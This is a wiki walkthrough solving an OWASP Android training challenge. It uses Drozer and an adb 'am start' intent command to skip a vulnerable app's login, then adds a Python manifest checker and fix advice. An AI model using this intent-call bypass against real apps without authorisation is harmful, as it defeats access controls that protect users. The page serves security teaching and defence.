
Authorised Area Solution

Tim Guenther edited this page Jul 24, 2017 · 1 revision
  1. Follow the challenge set up guide.
  2. Execute the following commands in the Drozer CLI:
    1. run app.package.list
      This will generate a list of all packages installed on the device/emulator.
    2. run app.package.info -a ruhrpott.owasp.com.vuln_app_1
      This will display general information about the application.
    3. run app.package.manifest ruhrpott.owasp.com.vuln_app_1
      Displays information about the manifest and available intents.
  3. With the information gathered with Drozer, we will open a shell on the Android device/emulator:
    adb shell
  4. Finally, we call the intent manually to bypass the authorisation:
    am start -a "ruhrpott.owasp.com.vuln_app_1.loggeddin" -t "text/plain"
    -a : The intent action to call.
    -t : The MIME type for the intent.
  5. On the Android VM the app will open a message with "You did it! Well done."
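The bypass works because the post-login activity is reachable from outside the app through its intent filter. The following added example (not part of the original wiki or the challenge app) shows a manifest review check that flags such activities. The manifest is constructed for illustration and the activity names are hypothetical; only the package name and the action string come from the steps above.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest for illustration; activity names are hypothetical,
# only the package and the action string come from the walkthrough.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="ruhrpott.owasp.com.vuln_app_1">
  <application>
    <activity android:name=".LoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AuthorisedActivity">
      <intent-filter>
        <action android:name="ruhrpott.owasp.com.vuln_app_1.loggeddin"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <data android:mimeType="text/plain"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="false"/>
  </application>
</manifest>"""


def unprotected_activities(manifest_xml):
    """Return [(activity, [actions])] reachable by other apps without a permission."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    app_perm = app.get(ANDROID + "permission") if app is not None else None
    findings = []
    for act in root.iter("activity"):
        actions = [a.get(ANDROID + "name") for a in act.iter("action")]
        exported = act.get(ANDROID + "exported")
        # Before API 31, an intent-filter implies exported="true" when unset.
        is_exported = exported == "true" or (exported is None and bool(actions))
        permission = act.get(ANDROID + "permission") or app_perm
        is_launcher = "android.intent.action.MAIN" in actions
        if is_exported and not permission and not is_launcher:
            findings.append((act.get(ANDROID + "name"), actions))
    return findings


if __name__ == "__main__":
    for name, actions in unprotected_activities(SAMPLE_MANIFEST):
        print(f"exported without permission: {name} actions={actions}")
```

Setting android:exported="false" on the flagged activity, or requiring an android:permission, clears the finding; the activity should also verify the login state itself instead of trusting that it was started from the login screen.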